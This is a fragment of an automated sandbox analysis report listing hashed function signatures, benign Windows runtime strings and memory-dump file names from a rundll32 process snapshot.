                                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                                  • Opcode ID: 2e25eceb95f012d8931a6615748e30186759b474521898404ced3801d7fb23f2
                                                                                                                                                                  • Instruction ID: 56066ec9635dcd3c84ce66db9266c571716e577f1156b500c43cf93dc3f1bf35
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e25eceb95f012d8931a6615748e30186759b474521898404ced3801d7fb23f2
                                                                                                                                                                  • Instruction Fuzzy Hash: BA41BF317007429BEB20DE258940B6BB7E5EB88718F000A1EE956DB780DB71F8068B91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0446728C
                                                                                                                                                                  Strings
                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 044672C1
                                                                                                                                                                  • RTL: Resource at %p, xrefs: 044672A3
                                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04467294
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                                  • Opcode ID: 19426b97d9b00d97ad5c3674a99a79066807b28ab741758f7238a73ae7e0c9b2
                                                                                                                                                                  • Instruction ID: b8d6f85cce112454fab7fea61f28c0c4c8eeeacdb351b03bdaa07ccf6ddf6705
                                                                                                                                                                  • Opcode Fuzzy Hash: 19426b97d9b00d97ad5c3674a99a79066807b28ab741758f7238a73ae7e0c9b2
                                                                                                                                                                  • Instruction Fuzzy Hash: 7441D231700656ABEF20DE25CD41B6AB7A5FB44718F10061BF956AB341DB21F846CBD1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                                  • Opcode ID: 3f1656a1484f66803c965040a367aa43ff816716e74313a87ac04fd3b3c66e14
                                                                                                                                                                  • Instruction ID: ef42af8d9e97178ca04157c6ff48b21b536f2cae3ec1919df2e6e84f7ba82aa9
                                                                                                                                                                  • Opcode Fuzzy Hash: 3f1656a1484f66803c965040a367aa43ff816716e74313a87ac04fd3b3c66e14
                                                                                                                                                                  • Instruction Fuzzy Hash: 23317272A001299EDF20DE29CC40AAB77E8FF55614F44059AE849E3340EE70AA559B61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                  • String ID: +$-
                                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                  • Instruction ID: 240e6bab2f29c04f7359be8c28266e3276d4c20f5317b912f0d424fc3da8e7cc
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A9165B1E002159AEF24DF59C8816BFB7B5BF4CB26F14851BF895A73C0E730A9418B50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.00000000044ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_43c0000_rundll32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                                  • Opcode ID: a20653a78e5fee84851237ce270ce75e20aaa93fd1b361ac760364eece250942
                                                                                                                                                                  • Instruction ID: c992e7fa1893654af5f3c8a9bb54cd98c41fd7a198501d025f4429e2e0515d08
                                                                                                                                                                  • Opcode Fuzzy Hash: a20653a78e5fee84851237ce270ce75e20aaa93fd1b361ac760364eece250942
                                                                                                                                                                  • Instruction Fuzzy Hash: F781FAB1D002699BDF35DB54CC44BEAB7B4AF48714F0041EBAA19B7291E7706E85CFA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%